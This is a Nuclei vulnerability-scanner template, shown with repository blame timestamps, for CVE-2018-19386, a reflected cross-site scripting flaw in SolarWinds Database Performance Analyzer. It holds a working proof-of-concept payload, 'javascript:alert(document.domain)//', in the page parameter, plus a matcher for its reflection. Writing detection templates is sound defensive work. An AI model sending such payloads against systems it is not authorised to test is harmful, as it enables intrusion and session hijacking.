nuclei-templates/http/cves/2018/CVE-2018-19386.yaml

44 lines
1.9 KiB
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-19386
2020-09-09 01:45:42 +00:00
info:
name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
2020-09-09 01:45:42 +00:00
author: pikpikcu
severity: medium
description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or defacement of the affected application.
2023-09-06 12:57:14 +00:00
remediation: |
Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer.
reference:
- https://i.imgur.com/Y7t2AD6.png
- https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
- https://nvd.nist.gov/vuln/detail/CVE-2018-19386
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-19386
cwe-id: CWE-79
epss-score: 0.00177
epss-percentile: 0.54754
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: solarwinds
product: database_performance_analyzer
tags: cve,cve2018,solarwinds,xss
2020-09-09 01:45:42 +00:00
http:
2020-09-09 01:45:42 +00:00
- method: GET
path:
2020-10-15 18:50:10 +00:00
- "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"
2020-09-09 01:45:42 +00:00
matchers-condition: and
matchers:
- type: word
words:
- '<a href="javascript:alert(document.domain)//'
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502202509b59bc3f7b365cd0a9849aceee35902998c0c68765e4465c9481b25692e84022100cbeec72fc01472a0e85b57b01c001ba0bc90212ac0e03de6304c3a87efb4b000:922c64590222798bb761d5b6d8e72950